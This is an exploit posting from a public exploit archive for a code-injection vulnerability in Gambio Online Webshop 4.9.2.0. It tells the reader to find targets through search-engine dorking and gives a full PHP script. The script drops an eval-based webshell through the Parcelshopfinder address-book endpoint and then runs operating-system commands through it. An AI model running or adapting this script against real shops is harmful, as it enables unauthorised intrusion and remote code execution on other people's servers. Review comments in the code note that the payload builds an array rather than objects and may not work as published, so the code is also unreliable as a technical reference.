## https://sploitus.com/exploit?id=PACKETSTORM:182017
=============================================================================================================================================  
| # Title : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.gambio.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or another search engine to find targets.  
  
[+] Sends HTTP POST requests to the target (PHP `http://` stream wrapper via `file_get_contents`, not cURL as the original wording claimed) to drop a webshell and then call it.  
  
[+] Set your target: replace `https://target.com` in the `new GambioExploit('https://target.com')` call at the bottom of the script (line 85 of the listing as published).  
  
[+] Save the code below as poc.php.  
  
[+] Usage: from a command prompt, run `php poc.php` (e.g. from `c:\www\test`).  
  
[+] Payload:  
  
<?php  
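/**
 * Proof-of-concept client for the Gambio Online Webshop 4.9.2.0 issue
 * described in the advisory header above.
 *
 * Flow:
 *   1. uploadWebshell() POSTs a base64(serialize(...)) blob in the `search`
 *      field of /shop.php?do=Parcelshopfinder/AddAddressBookEntry.
 *   2. executePhp() / executeCommand() POST to /<webshellName>, where the
 *      dropped file @eval()s the base64-decoded value of a per-instance
 *      POST parameter.
 *
 * Transport is the PHP http:// stream wrapper (file_get_contents), not cURL,
 * whatever the advisory text says. Nothing here confirms the webshell exists
 * on the target: the upload is fire-and-forget, and the printed messages only
 * report that a request was sent (or that it failed outright).
 *
 * NOTE(review): the upload payload serialize()s a nested *array* whose keys
 * are class names ("GuzzleHttp\Cookie\FileCookieJar", ...). That yields an
 * `a:` array, not an `O:` object, so unserialize() on the target rebuilds a
 * plain array and no FileCookieJar destructor (or other object gadget) can
 * fire from it. The payload is kept byte-for-byte as published; verify the
 * behaviour against a real instance before trusting it.
 */
class GambioExploit
{
    /** @var string Shop base URL without a trailing slash, e.g. https://shop.example */
    private $targetUrl;

    /** @var string File name (under the web root) the dropped webshell is expected to have. */
    private $webshellName;

    /** @var string Random POST parameter the dropped shell reads its base64 PHP code from. */
    private $postParam;

    /** @var string Random GET parameter name sent by executeCommand(); the dropped shell never reads it. */
    private $getParam;

    /** @var string PHP function executeCommand() wraps OS commands in (default: passthru). */
    private $phpCmdFunction;

    /**
     * @param string      $targetUrl      Base URL of the shop (scheme + host[:port]); a trailing slash is stripped.
     * @param string      $phpCmdFunction PHP function used to run OS commands, e.g. passthru, system, shell_exec.
     * @param string|null $webshellName   Fixed webshell file name; null picks a random 8-letter name + ".php".
     */
    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null)
    {
        // Avoid "https://host//shop.php" when the caller passes a trailing slash.
        $this->targetUrl = rtrim($targetUrl, '/');
        $this->phpCmdFunction = $phpCmdFunction;
        // Random names keep the dropped file / parameter from colliding with
        // (or being guessable by) anyone else poking at the same host.
        $this->webshellName = $webshellName ?: $this->randomString() . '.php';
        $this->postParam = $this->randomString();
        $this->getParam = $this->randomString();
    }

    /**
     * Name of the webshell file this instance uploads to / talks to.
     *
     * @return string
     */
    public function getWebshellName()
    {
        return $this->webshellName;
    }

    /**
     * Random ASCII-letter string from a CSPRNG.
     *
     * The published version used str_shuffle(), which is driven by a
     * non-cryptographic RNG; random_int() is used here because the result
     * doubles as the "secret" that gates access to the dropped shell.
     *
     * @param int $length Number of characters.
     * @return string
     */
    private function randomString($length = 8)
    {
        $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $last = strlen($alphabet) - 1;
        $out = '';
        for ($i = 0; $i < $length; $i++) {
            $out .= $alphabet[random_int(0, $last)];
        }
        return $out;
    }

    /**
     * POST a form-encoded body to $uri on the target.
     *
     * @param string $uri  Path (and optional query string) relative to the base URL.
     * @param array  $data Form fields.
     * @return string|false Response body (also for 4xx/5xx, thanks to ignore_errors), or false when
     *                      no HTTP response came back at all (DNS/TCP/TLS failure, timeout).
     */
    private function sendPostRequest($uri, $data)
    {
        $url = $this->targetUrl . $uri;
        $context = stream_context_create([
            'http' => [
                'method'        => 'POST',
                'header'        => "Content-type: application/x-www-form-urlencoded\r\n",
                'content'       => http_build_query($data),
                // Without this, a 4xx/5xx answer becomes a warning plus `false`,
                // hiding what the target actually said.
                'ignore_errors' => true,
                // Do not hang forever on an unresponsive host.
                'timeout'       => 30,
            ],
        ]);

        return file_get_contents($url, false, $context);
    }

    /**
     * Send the upload request that is supposed to drop the webshell.
     *
     * Reports the outcome of the HTTP request only; it does not probe for the
     * file afterwards, so a printed path is not proof the shell exists.
     *
     * @return bool True when an HTTP response was received, false when the request failed outright.
     */
    public function uploadWebshell()
    {
        // Dropped file: @eval()s whatever base64 arrives in $this->postParam.
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";

        // Kept byte-for-byte as published. NOTE(review): this is serialize()
        // of a nested array keyed by class names, not of objects (see class
        // docblock), and "Domain" is hard-coded instead of derived from
        // $this->targetUrl.
        $finalPayload = base64_encode(serialize([
            "GuzzleHttp\\Cookie\\FileCookieJar" => [
                "cookies" => [
                    "GuzzleHttp\\Cookie\\SetCookie" => [
                        "data" => [
                            "Value"  => $phpPayload,
                            "Domain" => "target.com",
                            "Path"   => "/",
                        ],
                    ],
                ],
                "filename" => $this->webshellName,
            ],
        ]));

        $response = $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [
            'checkout_started' => 0,
            'search'           => $finalPayload,
            'firstname'        => 'test',
            'lastname'         => 'test',
        ]);

        if ($response === false) {
            echo "Upload request to {$this->targetUrl} failed: no HTTP response.\n";
            return false;
        }

        echo "Upload request sent; expected webshell path: /{$this->webshellName}\n";
        return true;
    }

    /**
     * Run arbitrary PHP through the dropped shell and print the response body.
     *
     * @param string $cmd PHP source without an opening tag, e.g. "echo PHP_VERSION;".
     * @return string|false Response body, or false when the request failed outright.
     */
    public function executePhp($cmd)
    {
        $response = $this->sendPostRequest("/{$this->webshellName}", [
            $this->postParam => base64_encode($cmd),
        ]);

        if ($response === false) {
            echo "Request to /{$this->webshellName} failed: no HTTP response.\n";
            return false;
        }

        echo "Executed PHP via webshell: {$cmd}\n";
        echo $response, "\n";
        return $response;
    }

    /**
     * Run an OS command through the dropped shell and print the response body.
     *
     * The dropped shell only @eval()s PHP, so the command is wrapped in the
     * configured function (passthru by default). The published version sent
     * the bare command, which the shell would have tried to eval() as PHP
     * rather than run; the GET parameter it also sent is kept for wire
     * compatibility even though the shell never reads it.
     *
     * @param string $cmd OS command line, e.g. "id".
     * @return string|false Response body, or false when the request failed outright.
     */
    public function executeCommand($cmd)
    {
        // var_export() yields a correctly quoted PHP string literal for $cmd.
        $php = $this->phpCmdFunction . '(' . var_export($cmd, true) . ');';

        $response = $this->sendPostRequest(
            "/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}",
            [$this->postParam => base64_encode($php)]
        );

        if ($response === false) {
            echo "Request to /{$this->webshellName} failed: no HTTP response.\n";
            return false;
        }

        echo "Executed command: {$cmd}\n";
        echo $response, "\n";
        return $response;
    }
}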
  
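// Example usage: `php poc.php https://shop.example`. Without an argument the
// placeholder below is used — edit it or pass the real target on the command
// line. Both calls are single HTTP POSTs; the printed messages report that a
// request was sent, not that the shell actually landed on the target.
$targetUrl = isset($argv[1]) ? $argv[1] : 'https://target.com';
$exploit = new GambioExploit($targetUrl);
$exploit->uploadWebshell();
$exploit->executeCommand('id');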
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================